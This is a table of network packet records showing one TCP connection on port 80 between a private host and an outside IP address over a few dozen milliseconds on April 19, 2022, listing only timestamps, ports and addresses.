Apr 19, 2022 16:44:41.850099087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.850152969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.850217104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.850338936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.850410938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.850461960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.850584030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.850645065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.850694895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.850739956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.850801945 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.850900888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.850996017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.851048946 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.851140022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.851221085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.851284027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.851331949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.851460934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.851516008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.851545095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.851661921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.851722002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.851788044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.851933002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.851989031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.852052927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.852142096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.852204084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.852231026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.852364063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.852421045 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.852453947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.852615118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.852665901 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.852727890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.852813959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.852866888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.852915049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.853055000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.853110075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.853128910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.853250980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.853354931 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.853369951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.853482008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.853533983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.853631973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.853702068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.853830099 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.853863001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.853935957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.853991032 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.854105949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.854185104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.854259968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.854295969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.854582071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.854652882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.854775906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.855014086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.855068922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.855233908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.855325937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.855385065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.855619907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.855814934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.855866909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.856041908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.856307983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.856376886 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.856410980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.856539965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.856594086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.856653929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.856780052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.856859922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.856897116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.856981039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.857032061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.857053995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.857254982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.857311964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.857335091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.857459068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.857516050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.857572079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.857702017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.857754946 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.857775927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.857897043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.857954979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.858015060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.858150005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.858202934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.858295918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.858314037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.858362913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.858504057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.858697891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.858716965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.858752012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.858923912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.858978033 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.859066010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.859188080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.859252930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.859260082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.859297991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.859314919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.859349012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.859458923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.859513044 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.859572887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.859719038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.859769106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.859790087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.859915972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.859985113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.860021114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.860131979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.860200882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.860234976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.860344887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.860402107 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.860497952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.860591888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.860640049 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.860739946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.860800028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.860847950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.860980988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.861092091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.861140966 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.861174107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.861259937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.861310005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.861426115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.861490965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.861546993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.861624002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.861722946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.861774921 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.861870050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.861978054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.862036943 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.862041950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.862216949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.862267017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.862298012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.862422943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.862476110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.862497091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.862654924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.862704992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.862735987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.862839937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.862890959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.862951040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.863096952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.863151073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.863209009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.863346100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.863401890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.863414049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.863537073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.863590002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.863646030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.863821983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.863876104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.863878965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.863996029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.864063978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.864095926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.864206076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.864257097 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.864341974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.864490032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.864568949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.864573956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.864747047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.864808083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.864809990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.864936113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.864995956 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.865014076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.865092993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.865160942 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.865200043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.865335941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.865397930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.865504026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.865570068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.865631104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.865667105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.865793943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.865864992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.865940094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.866030931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.866086006 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.866137028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.866241932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.866302013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.866374969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.866465092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.866523981 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.866636992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.866688967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.866748095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.866795063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.866938114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.866991043 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.867094994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.867134094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.867193937 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.867295980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.867372036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.867427111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.867494106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.867611885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.867669106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.867734909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.867976904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.868030071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.868215084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.868479013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.868537903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.868695974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.868978024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.869029999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.869138956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.869415998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.869478941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.869620085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.869729996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.869782925 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.869920015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.869944096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.870002985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.870085955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.870174885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.870238066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.870332956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.870419025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.870481968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.870518923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.870647907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.870702028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.870857954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.870874882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.870937109 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.870984077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.871134996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.871172905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.871191025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.871294975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.871351004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.871454000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.871529102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.871587992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.871695995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.871778011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.871834993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.871881962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.871973038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.872025013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.872137070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.872214079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.872271061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.872335911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.872453928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.872507095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.872555017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.872657061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.872713089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.872817993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.872895002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.872947931 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.873003960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.873116016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.873176098 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.873254061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.873336077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.873385906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.873460054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.873578072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.873635054 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.873691082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.873816013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.873871088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.873894930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.874008894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.874068975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.874142885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.874259949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.874311924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.874372005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.874501944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.874562979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.874609947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.874699116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.874792099 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.874800920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.874933958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.874993086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.875051975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.875158072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.875209093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.875267029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.875509977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.875567913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.875821114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.875989914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.876043081 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.876264095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.876460075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.876514912 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.876782894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.876974106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.877028942 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.877265930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.877418995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.877475023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.877505064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.877660036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.877715111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.877779961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.877886057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.877949953 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.877979994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.878144979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.878180981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.878211975 CEST	49758	80	192.168.2.4	45.135.48.153
